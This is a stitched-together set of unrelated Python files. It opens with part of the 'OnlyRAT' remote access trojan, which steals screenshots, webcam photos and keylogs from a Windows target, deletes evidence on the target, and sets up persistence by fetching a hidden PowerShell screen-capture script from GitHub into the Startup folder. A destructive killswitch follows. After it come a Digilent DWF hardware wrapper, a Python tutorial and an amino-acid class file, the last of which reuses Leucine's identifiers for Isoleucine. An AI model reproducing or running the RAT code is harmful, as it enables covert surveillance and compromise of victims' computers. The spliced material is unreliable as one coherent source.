print("[+] Screenshots downloaded")
# confirmation
print("\n[+] Screenshots downloaded to \"~/Downloads\"\n")
# takes webcam pictures off of target
def grab_webcam(address, password, working, username):
# download webcam photos
print("\n[*] Downloading webcam photos...")
screenshot_location = f"{working}/bNOEXCxyVp"
remote_download(address, password, screenshot_location)
print("[+] Photos downloaded")
# formatting webcam photos
print("[*] Fromatting photos...")
loot_folder = f"webcam-{username}-{current_date()}"
os.system(f"mkdir ~/Downloads/{loot_folder}")
os.system(f"mv ~/Downloads/bNOEXCxyVp/* ~/Downloads/{loot_folder}")
os.system(f"rm -rf ~/Downloads/bNOEXCxyVp")
print("[+] Photos formatted")
# deletes photos off of target
print("[*] Covering tracks...")
delete_screenshots = f"powershell Remove-Item {working}/bNOEXCxyVp/*.bmp"
remote_command(address, password, delete_screenshots)
print("[+] Photos downloaded")
# confirmation
print("\n[+] Photos downloaded to \"~/Downloads\"\n")
# killswitch
def killswitch(address, password, working, username):
print("\n[*] Prepping killswitch...")
# web requests
killswitch_command = f"powershell /c cd C:; Remove-Item {working}/* -r -Force; Remove-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0; Remove-Item \"C:/Users/onlyrat\" -r -Force; Remove-LocalUser -Name \"onlyrat\"; shutdown /r"
print("[+] Killswitch prepped")
# installing killswitch
print("[*] Executing killswitch...")
remote_command(address, password, f"cd C:/Users/{username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && del GiLqXiexKP.cmd")
remote_command(address, password, killswitch_command)
print("[+] Killswitch Executed sucessfully\n")
# execute logger
print("\n[*] Restarting target computer...")
# custom upload
def upload(address, password, working):
# get upload file
print("\n[~] Enter file you wish to upload :")
upload_file = input(header)
# upload file
print("\n[*] Uploading...")
remote_upload(address, password, upload_file, working)
print(f"[+] Uploaded sucessfully to \"{working}\"\n")
# custom download
def download(address, password):
# get download path
print("\n[~] Enter path of file you wish to download :")
download_file = input(header)
# download file
print("\n[*] Downloading...")
remote_download(address, password, download_file)
# update OnlyRAT
def update():
print("\n[*] Checking for updates...")
# get latest version nubmer
os.system(f"curl https://raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/version.txt | tee ~/.OnlyRAT/latest.txt")
# save version nubmers to memory
current_version = float(open(f"{local_path}/version.txt", "r").read())
latest_version = float(open(f"{local_path}/latest.txt", "r").read())
# remove version number file
os.system("rm -rf ~/.OnlyRAT/latest.txt")
# if new version is available, update
if latest_version > current_version:
print("\n[+] Update found")
print("[~] Update Onlyrat? [y/n]\n")
# user input, option
option = input(f"{header}")
# update
if option == "y":
os.system(f"sh ~/.OnlyRAT/payloads/update.sh")
# exception
else:
main()
# otherwise, run main code
else:
print("\n[+] OnlyRAT already up to date")
print("[*] Hit any key to continue...\n")
input(header)
main()
# uninstalls onlyrat
def remove():
# confirmation
print("\n[~] Are you sure you want to remove OnlyRAT [y/n]\n")
# user input
option = input(header)
# delete OnlyRAT
if option == "y":
os.system("rm -rf ~/.OnlyRAT")
# cancel
if option == "n":
main()
# listener
def listener():
pass
# command line interface
def cli(arguments):
# display banner
clear()
# listener
# if sys.argv[1] == "listener":
# listener()
print(banner)
# if arguments exist
if arguments:
print("\t[~] Type \"help\" for help menu :\n")
# loop user input
while True:
# user input, option
option = input(header)
# check if configuration file exists
try:
configuration = read_config(sys.argv[1])
except FileNotFoundError:
print("\n[!!] File does not exist")
exit()
# get config info
ipv4 = configuration.get("IPADDRESS")
password = configuration.get("PASSWORD")
working_direcory = configuration.get("WORKINGDIRECTORY")
startup_direcory = configuration.get("STARTUPDIRECTORY")
target_username = working_direcory[9:-19]
# remote console
if option == "orconsole":
connect(ipv4, password)
# fix remote console
if option == "fix orconsole":
os.system(f"sh {local_path}/payloads/fix-orconsole.sh {local_path} {ipv4} {password}")
# keylogger option
elif option == "install keylogger":
keylogger(ipv4, password, target_username, working_direcory)
# grab keylogs option
elif option == "grab keylogs":
remote_download(ipv4, password, f"{working_direcory}/{target_username}.log")
remote_command(ipv4, password, f"powershell New-Item -Path {working_direcory}/{target_username}.log -ItemType File -Force")
print("[+] Log file saved to \"~/Downloads\"")
print("[+] Log file on target has been wiped\n")
# installs screen capture option
elif option == "install screencapture":
print("\n[*] Installing screen capture...")
install_screencaputre = f"powershell powershell.exe -windowstyle hidden \"Invoke-WebRequest -Uri raw.githubusercontent.com/CosmodiumCS/OnlyRAT/main/payloads/screenshot.ps1 -OutFile {working_direcory}/SbQRViPjIq.ps1\""
add_to_startup = f"cd C:/Users/{target_username}/AppData/Roaming/Microsoft/Windows && cd \"Start Menu\" && cd Programs/Startup && echo powershell Start-Process powershell.exe -windowstyle hidden $env:temp/SbQRViPjIq.ps1 >> GiLqXiexKP.cmd"
remote_command(ipv4, password, install_screencaputre)
remote_command(ipv4, password, add_to_startup)
print("[+] ScreenCapture | |
|AnalogOut| channel.
node (DwfAnalogOutNode): The channel node.
Returns:
float: The currently configured node phase value, in degrees.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_phase = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutNodePhaseGet(
self.hdwf,
channel_index,
node.value,
c_phase)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
phase = c_phase.value
return phase
####################################################################################################################
# #
# NODE DATA MANAGEMENT #
# #
####################################################################################################################
def nodeDataInfo(self, channel_index: int, node: DwfAnalogOutNode) -> Tuple[float, float]:
"""Get data range for an |AnalogOut| channel node, in samples.
Parameters:
channel_index (int): The |AnalogOut| channel.
node (DwfAnalogOutNode): The channel node.
Returns:
Tuple[float, float]: The range of valid values.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_samples_min = typespec_ctypes.c_int()
c_samples_max = typespec_ctypes.c_int()
result = self.lib.FDwfAnalogOutNodeDataInfo(
self.hdwf,
channel_index,
node.value,
c_samples_min,
c_samples_max)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
samples_min = c_samples_min.value
samples_max = c_samples_max.value
return (samples_min, samples_max)
def nodeDataSet(self, channel_index: int, node: DwfAnalogOutNode, data: np.ndarray) -> None:
"""Set the data for an |AnalogOut| channel node.
Parameters:
channel_index (int): The |AnalogOut| channel.
node (DwfAnalogOutNode): The channel node.
data (np.ndarray): The data.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
double_data = data.astype(np.float64)
result = self.lib.FDwfAnalogOutNodeDataSet(
self.hdwf,
channel_index,
node.value,
double_data.ctypes.data_as(typespec_ctypes.c_double_ptr),
len(double_data))
if result != RESULT_SUCCESS:
raise self.dwf.exception()
def nodePlayStatus(self, channel_index: int, node: DwfAnalogOutNode) -> Tuple[int, int, int]:
"""Get the play status for an |AnalogOut| channel node.
Parameters:
channel_index (int): The |AnalogOut| channel.
node (DwfAnalogOutNode): The channel node.
Returns:
Tuple[int, int, int]: The *free*, *lost*, and *corrupted* status counts, in samples.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_data_free = typespec_ctypes.c_int()
c_data_lost = typespec_ctypes.c_int()
c_data_corrupted = typespec_ctypes.c_int()
result = self.lib.FDwfAnalogOutNodePlayStatus(
self.hdwf,
channel_index,
node.value,
c_data_free,
c_data_lost,
c_data_corrupted)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
data_free = c_data_free.value
data_lost = c_data_lost.value
data_corrupted = c_data_corrupted.value
return (data_free, data_lost, data_corrupted)
def nodePlayData(self, channel_index: int, node: DwfAnalogOutNode, data: np.ndarray) -> None:
"""Provide the playback data for an |AnalogOut| channel node.
Parameters:
channel_index (int): The |AnalogOut| channel.
node (DwfAnalogOutNode): The channel node.
data (np.ndarray): The playback data.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
result = self.lib.FDwfAnalogOutNodePlayData(
self.hdwf,
channel_index,
node.value,
data.ctypes.data_as(typespec_ctypes.c_double_ptr),
len(data))
if result != RESULT_SUCCESS:
raise self.dwf.exception()
####################################################################################################################
# #
# CARRIER CONFIGURATION (OBSOLETE) #
# #
####################################################################################################################
def enableSet(self, channel_index: int, enable: bool) -> None:
"""Enable or disable the specified |AnalogOut| channel.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeEnableSet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
enable (bool): The enable setting.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
result = self.lib.FDwfAnalogOutEnableSet(self.hdwf, channel_index, enable)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
def enableGet(self, channel_index: int) -> bool:
"""Get the current enable/disable status of the specified |AnalogOut| channel.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeEnableGet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
bool: The enable state of the channel.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_enable = typespec_ctypes.c_int()
result = self.lib.FDwfAnalogOutEnableGet(self.hdwf, channel_index, c_enable)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
enable = bool(c_enable.value)
return enable
def functionInfo(self, channel_index: int) -> List[DwfAnalogOutFunction]:
"""Get the |AnalogOut| channel waveform shape function info.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeFunctionInfo` method instead.
Returns:
List[DwfAnalogOutFunction]: The valid waveform shape functions.
Parameters:
channel_index (int): The |AnalogOut| channel.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_function_info_bitset = typespec_ctypes.c_unsigned_int()
result = self.lib.FDwfAnalogOutFunctionInfo(self.hdwf, channel_index, c_function_info_bitset)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
function_info_bitset = c_function_info_bitset.value
function_info_list = [function_ for function_ in DwfAnalogOutFunction
if function_info_bitset & (1 << function_.value)]
return function_info_list
def functionSet(self, channel_index: int, func: DwfAnalogOutFunction) -> None:
"""Set the |AnalogOut| channel waveform shape function.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeFunctionSet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
func (DwfAnalogOutFunction): The waveform shape function to use.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
result = self.lib.FDwfAnalogOutFunctionSet(self.hdwf, channel_index, func.value)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
def functionGet(self, channel_index: int) -> DwfAnalogOutFunction:
"""Get the |AnalogOut| channel waveform shape function.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeFunctionGet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
DwfAnalogOutFunction: The currently configured waveform shape function.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_func = typespec_ctypes.DwfAnalogOutFunction()
result = self.lib.FDwfAnalogOutFunctionGet(self.hdwf, channel_index, c_func)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
func = DwfAnalogOutFunction(c_func.value)
return func
def frequencyInfo(self, channel_index: int) -> Tuple[float, float]:
"""Get the |AnalogOut| channel valid frequency range, in Hz.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeFrequencyInfo` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
Tuple[float, float]: The valid frequency range, in Hz.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_hzMin = typespec_ctypes.c_double()
c_hzMax = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutFrequencyInfo(self.hdwf, channel_index, c_hzMin, c_hzMax)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
hzMin = c_hzMin.value
hzMax = c_hzMax.value
return (hzMin, hzMax)
def frequencySet(self, channel_index: int, frequency: float) -> None:
"""Set the |AnalogOut| channel frequency, in Hz.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeFrequencySet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
frequency (float): The frequency to use.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
result = self.lib.FDwfAnalogOutFrequencySet(self.hdwf, channel_index, frequency)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
def frequencyGet(self, channel_index: int) -> float:
"""Get the |AnalogOut| channel frequency, in Hz.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeFrequencyGet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
float: The currently configured frequency, in Hz.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_hzFrequency = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutFrequencyGet(self.hdwf, channel_index, c_hzFrequency)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
hzFrequency = c_hzFrequency.value
return hzFrequency
def amplitudeInfo(self, channel_index: int) -> Tuple[float, float]:
"""Get the |AnalogOut| channel amplitude range info.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeAmplitudeInfo` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
Tuple[float, float]: The range of valid amplitudes, in Volts.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_amplitude_min = typespec_ctypes.c_double()
c_amplitude_max = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutAmplitudeInfo(self.hdwf, channel_index, c_amplitude_min, c_amplitude_max)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
amplitude_min = c_amplitude_min.value
amplitude_max = c_amplitude_max.value
return (amplitude_min, amplitude_max)
def amplitudeSet(self, channel_index: int, amplitude: float) -> None:
"""Set the |AnalogOut| channel amplitude.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeAmplitudeSet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
amplitude (float): The amplitude, in Volts.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
result = self.lib.FDwfAnalogOutAmplitudeSet(self.hdwf, channel_index, amplitude)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
def amplitudeGet(self, channel_index: int) -> float:
"""Get the |AnalogOut| channel amplitude.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeAmplitudeGet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
float: The currently configured amplitude, in Volts.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_amplitude = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutAmplitudeGet(self.hdwf, channel_index, c_amplitude)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
amplitude = c_amplitude.value
return amplitude
def offsetInfo(self, channel_index: int) -> Tuple[float, float]:
"""Get the |AnalogOut| channel offset range info, in Volts.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeOffsetInfo` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
Tuple[float, float]: The valid range of offset values, in Volts.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_offset_min = typespec_ctypes.c_double()
c_offset_max = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutOffsetInfo(self.hdwf, channel_index, c_offset_min, c_offset_max)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
offset_min = c_offset_min.value
offset_max = c_offset_max.value
return (offset_min, offset_max)
def offsetSet(self, channel_index: int, offset: float) -> None:
"""Set the |AnalogOut| channel offset, in Volts.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeOffsetSet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
offset (float): The channel offset, in Volts.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
result = self.lib.FDwfAnalogOutOffsetSet(self.hdwf, channel_index, offset)
if result != RESULT_SUCCESS:
raise self.dwf.exception()
def offsetGet(self, channel_index: int) -> float:
"""Get the |AnalogOut| channel offset, in Volts.
Warning:
**This method is obsolete.**
Use the :py:meth:`nodeOffsetGet` method instead.
Parameters:
channel_index (int): The |AnalogOut| channel.
Returns:
float: The valid offset value, in Volts.
Raises:
DwfLibraryError: An error occurred while executing the operation.
"""
c_offset = typespec_ctypes.c_double()
result = self.lib.FDwfAnalogOutOffsetGet(self.hdwf, channel_index, c_offset)
| |
#Commenting for single
'''
Commenting for multiple lines
'''
#How to declare variables in Python
my_age = 40
#One variable can hold different data type
# Integer
my_var = 8
type(my_var)
# Float
my_var = 26.5
type(my_var)
# String
my_var = "FORSK"
type(my_var)
# Boolean
my_var = True
type(my_var)
# NoneType
my_var = None
type(my_var)
"""
Type Conversion using Global Functions
int()
float()
str()
bool()
"""
#How to convert the data type
int (10.6)
int ("10")
float (4)
float ("10")
str (4)
str (10.6)
bool (4) # Any integer greater than zero is True
bool (0)
bool (10.6) # Any float greater than 0.0 is True
bool(0.0)
bool(-90)
bool ("10")
bool("")
bool (None)
#Taking Integer Input from user
age = input ( "Enter your Age > ")
print (age)
print (type(age))
age = int(age)
print (age)
print (type(age))
#Taking Floating Point Input from user
temperature = input ( "Enter your temperature of your city > ")
print (temperature)
print (type(temperature))
temperature = float(temperature)
print (temperature)
print (type(temperature))
#Taking String Input from user using raw_input function
name = input ( "Enter your Name >")
print (name)
print (type(name))
#Printing Output to the screen using single quote
print ( 'FORSK TECHNOLOGIES' )
#Printing Output to the screen using double quote
print ( "FORSK TECHNOLOGIES" )
#Using Triple Quotes to print quotation marks in string
print ("""FORSK"S TECHNOLOGIES""")
# Importing Modules
import math
math.sqrt ( 16 )
math.log ( 16, 2 )
math.cos ( 0 )
math.isnan(90)
# Importing Names from a Module Directly
#How to use specific functions from packages or modules in python
from math import sqrt
sqrt ( 16 )
#How to use specific functions from packages or modules
#and also aliasing
from math import sqrt as square
square ( 16 )
# How to find the function within the Module/Package
dir ( math )
help (math.sqrt)
#Slicing of strings
newstr = "<NAME>"
# Indexing using Left to Right
#START
print(newstr [ 0 ]) # 1st thing (0-indexed)
print(newstr [ -12 ])
# Indexing using Right to Left
print (newstr [ -1 ] ) # Last thing
#START and END
print(newstr[:3]) # First three things
print(newstr[-3:]) # Last three things
print(newstr[3:]) # Everything *except* the first three
print(newstr[:-3]) # Everything *except* the last three\
newstr [ 6:10 ]
newstr [ : 5 ]
newstr [ 6 : ]
newstr [ : ]
#Strings in python are Immutable
newstr = "<NAME>"
newstr [ 0 ] = "m"
#or
del newstr [ 0 ]
del newstr
"""
Global Inbuilt function ( len and del )
"""
newstr = "<NAME>"
len ( newstr )
print ( newstr )
del ( newstr )
# String functions
# ( lower, upper, find, replace, strip, lstrip, rstrip, split, join)
# creates a new copy of the string
newstr = " <NAME> "
print(newstr)
newstr.lower()
print(newstr)
newstr2= newstr.lower()
print(newstr2)
newstr.upper()
newstr.find('r')
newstr.find('P')
newstr.replace(' ','\n')
newstr.lstrip()
newstr.rstrip()
newstr.strip()
newstr.split()
newstr.index('M')
string="Rajasthan"
" ".join( string )
#to list all the functions for an object
dir ( str )
#to check the syntax for a specific function of the object
help ( str.strip )
#Take the age as input from the user and print
age = int(input("Enter your age>"))
#Take the age as input from the user and print
age = int(input("Enter your age>"))
if ( age > 0 ):
print ("Valid Age")
else:
print ("Invalid Age")
"""
Looping technique using while
"""
n = 0
while (n < 10):
print (n)
n = n + 1
#n += 1
"""
List
"""
#List Creation
my_list = [ 1, 2, 3 ]
print(my_list)
#Adding single items in the list in the last
my_list.append( 5 )
print(my_list)
#Adding single item in the list at a specific position in the list
my_list.insert ( 0, 0 )
print(my_list)
#Remove a specific item by its value from the list
my_list.remove ( 4 ) #( ValueError here since 4 is not in the list )
# Accessing the values of the list using index
print(my_list[0])
#Sorting of the list items
print(my_list)
my_list.sort()
print (my_list)
# Membership Operators
# in , not in
# Used to check if some single item is in a larger collection
# Return True if the item is in list
# Return False if the item is not in list
# Example
some_list = [1,2,3,5,6,2,4,3,5,6,7,8,1,2,3]
3 in some_list # will return True
3 not in some_list # will return False
7 not in some_list # will return True
# Hand on Challenge
while (3 in some_list):
some_list.remove(3)
print (some_list)
"""
Looping technique using for each
"""
my_list = [0,1,2,3,4,5,6]
for number in my_list:
print (number)
# default the range starts from 0
our_list = list(range(13))
print (type(our_list))
print (our_list)
for number in list(range (13)):
print (number)
for number in list(range (1,13)):
print (number)
"""
dictionary
"""
phone_book = { 'Vidhan':8504982228, 'Aayushi':8905336615, 'Vibhooti':9414701291 }
print(phone_book)
print(type(phone_book))
# Creation of dictionaries
dict1 = {'fname':'John', 'lname':'Mille', 'profession':'plumber', 'age':'32'}
print(dict1)
# Add/Update
dict1['lname'] = 'Miller'
dict1['profession'] = 'electrician'
dict1['age'] = '36'
dict1['city'] = 'NY' #add
print(dict1)
dict1['city'] = 'MA' #update
print(dict1)
dict1.update ( {'age':32, 'city':'NY' } )
print(dict1)
# Printing Values
print (dict1["lname"])
print (dict1.get('lname'))
print (dict1.get('name'))
print (dict1.get('name', 'Not Found'))
dict1 = {'fname':'John', 'lname':'Miller', 'profession':'plumber', 'age':'32'}
# To list all the keys
a = dict1.keys()
print(a)
print(type(a))
# To list all the values
print(dict1.values())
# To list all the values
print(dict1.items())
# To list all values and keys
for key in dict1:
print ( key , dict1[key] )
for key in dict1:
print ( key , dict1.get(key) )
"""
NumPy
"""
a = [0,1,2,3,4,5,6,7,8]
print (type(a))
print (a)
# it always prints the values with comma seperated , thats list
# Convert your list data to NumPy arrays
import numpy as np
x = np.array( a )
print (type(x))
print (x)
# it always prints the values WITHOUT comma seperated , thats ndarray
# to print the data type of the elements of array
print (x.dtype)
# to print the dimension of the array
print (x.ndim)
# to print the shape of the array
# returns a tuple listing the length of the array along each dimension
# For a 1D array, the shape would be (n,)
# where n is the number of elements in your array.
print (x.shape)
# Array Indexing will always return the data type object
print (x[0])
print (x[2])
print (x[-1])
"""
Series
"""
#Import Python Libraries
import pandas as pd
# Create an Empty Series
s = pd.Series()
print (type(s))
print (s)
# Create a Series from ndarray
import numpy as np
data = np.array(['a','b','c','d'])
print (type(data ))
s = pd.Series(data)
print (type(s))
print (s)
# We did not pass any index, so by default,
# it assigned the indexes ranging from 0 to len(data)-1, i.e., 0 to 3.
#retrieve the first element
print (s[0])
#retrieve the first three element
print (s[:3])
#retrieve the last three element
print (s[-3:])
# Customised Index value
data = np.array(['a','b','c','d'])
s = pd.Series(data,index=[100,101,102,103])
print (s)
"""
DataFrame
"""
# A Data frame is a two-dimensional data structure, i.e.,
# data is aligned in a tabular fashion in rows and columns.
# You can think of it as an SQL table or a spreadsheet data representation
import pandas as pd
#Create an Empty DataFrame
df = pd.DataFrame()
print (df)
# Create a DataFrame from Lists
data = [1,2,3,4,5]
df = pd.DataFrame(data)
print (df)
# Create a DataFrame from List of Lists
data = [['Alex',10],['Bob',12],['Clarke',13]]
df = pd.DataFrame(data,columns=['Name','Age'])
print (df)
"""
Exploratory Data Analysis of Salaries Data
"""
"""
1. Which Male and Female Professor has the highest and the lowest salaries.
2. Which Professor takes the highest and lowest salaries.
3. Missing Salaries - should be mean salaries.
4. Missing phd - should be mean phd.
5. How many are Male Staff and How many are Female Staff.
6. How many are Prof, AssocProf and AsstProf.
7. Who are the senior and junior most employees in the organization.
"""
import pandas as pd
#Read csv file
df = pd.read_csv("data/Salaries.csv")
# Not a good technique to print the Data Frame
print (df)
df.info()
#List first 5 records
df.head()
#Can you guess how to view the last few records;
df.tail(5)
# Gives the row Indexes
df.index
#list the column names / column Indexes
df.columns
#Check types for all the columns
df.dtypes
#numpyrepresentation of the data
df.values
# generate descriptive statistics (for numeric columns only)
# Standard Deviation is quite useful tool to figure out
# how the data is spread above or below the mean.
# The higher the value, the less is reliable or vice versa.
df.describe() # Numeric Columns
#return max/min values for all columns
df.max()
df.min()
#return max/min values for all numeric columns
df.mean()
df.median()
df.std()
#returns a random sample of the data frame
df.sample(5)
"""
Data Frames: method loc
If we need to select a range of rows, using their labels/index
we can use method loc
"""
df.loc[:1]
df.loc[10:20,['rank','sex']]
"""
Data Frames: method iloc
If we need to select a range of rows and/or columns,
using their positions we can use method iloc
"""
df.iloc[:2]
df.iloc[ 10:21 , [0,4] ]
"""
Selecting a column in a Data Frame with all rows
"""
df.iloc[:,2]
df.loc[:,'phd']
# Read the data from a specific Series
df.phd
# Dont use this technique
df.rank
# This is the best practice
df['phd']
#Select column rank and salary:
df[['rank','salary']]
# Find unique values in a Series / Column
df['rank'].unique()
df['discipline'].unique()
df['sex'].unique()
list1 = df['sex'].unique().tolist()
# intuition about a Rank Series
df['rank']
df['rank'].value_counts()
# to show in Percentage | |
class AminoAcid:
def __init__(self,name='AA'):
self.name = name
self.name3L = ''
self.Hydrophobic = 0 # 1: Hydrophobic, 0: Hydrophilic
self.charge = 0
self.polar = 0
self.corner = 0 # Would prefer to be at a corner : give positive value
self.loop = 0 # cost/benefit when on a loop
self.size = 0 # Residue size (0:1) 0:ignor size, 1:Large residue
self.SpecialRes = {0:0} # Special characteristic of residue
self.ResWeight = 0 # residue weight (weight - 56) backbone weight is 56
self.ResVol = 0 # Residue volume from http://prowl.rockefeller.edu/aainfo/volume.htm
self.SideChainVol = 0 # Side Chain volume is evaluated as ResVol - 0.9 Gly.ResVol
self.Hydropathy = 0 # Hydropathy index
self.n1 = 0
self.n2 = 0
# n values
# -1 when the amino acid (AA) residue has an N donor, short residue.
# -2 when the AA residue has an O acceptor, short residue.
# -3 when the AA residue has an N donor, long residue that able to bond across two turns.
# -5 when the AA residue has an O acceptor, long residue that able to bond across two turns.
# -7 when it is a Cystine(C)
# 0 when bond is not possible.
# 1 when this N or O participating in a bond.
# A residu can only participate in one side-chain bond. So when a bond is created
# for example with n1, n1 get the bond value and n2 will be assigned 0
def __mul__ (self,other):
# Evaluating side chain interaction
Prod = self.donor * other.acceptor
return Prod
# ############ Non Polar, HydroPhobic ###########
class Ala(AminoAcid):
def __init__(self):
AminoAcid.__init__(self,'A')
# Alanine
# ###
# CH3-CH(NH2)-COOH
#
#
# Molecular weight 89.09 Da
# Non ploar
# Acidity - Natural
# Hydrophobicity 0.616 (Analytical Bio chemistry 193:11,72-82 Elsevier 1991)
# Hydrophathy index 1.8 (J.Mol.Bio(1982) 157, 105-132)
# Isoelectric point (when protonation accure) pH 6.01
# pKa( alpha-COOH) 2.35
# pKa( alpha-NH2) 9.87
# CAS # 56-41-7
# PubChem ID 5950
#
self.name3L = 'ALA'
self.Hydrophobic = 1 # 1: Hydrophobic, 0: Hydrophilic
self.charge = 0
self.polar = 0
self.corner = 0 # Would prefer to be at a corner : give positive value
self.loop = 0 # cost/benefit when on a loop
self.size = 0 # Residue size (0:1) 0:ignor size, 1:Large residue
self.SpecialRes = {0:0} # Special characteristic of residue
self.n1 = 0
self.n2 = 0
self.Hydropathy = 1.8
self.ResWeight = 33
self.ResVol = 88.6
self.SideChainVol = 88.6-54.1
class Val(AminoAcid):
def __init__(self):
AminoAcid.__init__(self,'V')
# Valine
# #########
# (CH3)2-CH-CH(NH2)-COOH
#
#
# Essential AA (cannot be synthesized by humans)
# Molecular weight 117.15 Da
# Non ploar
# Acidity - Natural
# Hydrophobicity 0.825 (Analytical Bio chemistry 193:11,72-82 Elsevier 1991)
# Hydrophathy index 4.2 (J.Mol.Bio(1982) 157, 105-132)
# Isoelectric point 6.00
# pKa( alpha-COOH) 2.39
# pKa( alpha-NH2) 9.74
# CAS # 72-18-4
# PubChem ID 1182
#
self.name3L = 'VAL'
self.Hydrophobic = 1 # 1: Hydrophobic, 0: Hydrophilic
self.charge = 0
self.polar = 0
self.corner = 0 # Would prefer to be at a corner : give positive value
self.loop = 0 # cost/benefit when on a loop
self.size = 0 # Residue size (0:1) 0:ignor size, 1:Large residue
self.SpecialRes = {0:0} # Special characteristic of residue
self.n1 = 0
self.n2 = 0
self.Hydropathy = 4.2
self.ResWeight = 61
self.ResVol = 140.0
self.SideChainVol = 140-54.1
class Leu(AminoAcid):
def __init__(self):
AminoAcid.__init__(self,'L')
# Leucine
# #############
# (CH3)2-CH-CH2-CH(NH2)-COOH
#
#
# Essential AA
# Molecular weight 131.18 Da
# Non ploar
# Acidity - Natural
# Hydrophobicity 0.943 (Analytical Bio chemistry 193:11,72-82 Elsevier 1991)
# Hydrophathy index 3.8 (J.Mol.Bio(1982) 157, 105-132)
# Isoelectric point 6.01
# pKa( alpha-COOH) 2.33
# pKa( alpha-NH2) 9.74
# CAS # 61-90-5
# PubChem ID 6106
#
self.name3L = 'LEU'
self.Hydrophobic = 1 # 1: Hydrophobic, 0: Hydrophilic
self.charge = 0
self.polar = 0
self.corner = 0 # Would prefer to be at a corner : give positive value
self.loop = 0 # cost/benefit when on a loop
self.size = 0 # Residue size (0:1) 0:ignor size, 1:Large residue
self.SpecialRes = {0:0} # Special characteristic of residue
self.n1 = 0
self.n2 = 0
self.Hydropathy = 3.8
self.ResWeight = 75
self.ResVol = 166.7
self.SideChainVol = 166.7-54.1
class Ile(AminoAcid):
def __init__(self):
AminoAcid.__init__(self,'I')
# Isoleucine
# ###############
# CH3-CH2-CH(CH3)-CH(NH2)-COOH
#
#
# Essential AA
# Molecular weight 131.18 Da
# Non ploar
# Acidity - Natural
# Hydrophobicity 0.943 (Analytical Bio chemistry 193:11,72-82 Elsevier 1991)
# Hydrophathy index 4.5 (J.Mol.Bio(1982) 157, 105-132)
# Isoelectric point 6.05
# pKa( alpha-COOH) 2.33
# pKa( alpha-NH2) 9.74
# CAS # 61-90-5
# PubChem ID 6106
#
self.Hydropathy = 4.5
self.ResWeight = 75
self.name3L = 'ILE'
self.Hydrophobic = 1 # 1: Hydrophobic, 0: Hydrophilic
self.charge = 0
self.polar = 0
self.corner = 0 # Would prefer to be at a corner : give positive value
self.loop = 0 # cost/benefit when on a loop
self.size = 0 # Residue size (0:1) 0:ignor size, 1:Large residue
self.SpecialRes = {0:0} # Special characteristic of residue
self.n1 = 0
self.n2 = 0
self.ResVol = 166.7
self.SideChainVol = 166.7-54.1
class Phe(AminoAcid):
def __init__(self):
AminoAcid.__init__(self,'F')
# Phenylalanine
# ######
# Ph-CH2-CH(NH2)-COOH
# The residue Ph-CH2 : C6H5-CH2 benzyl
#
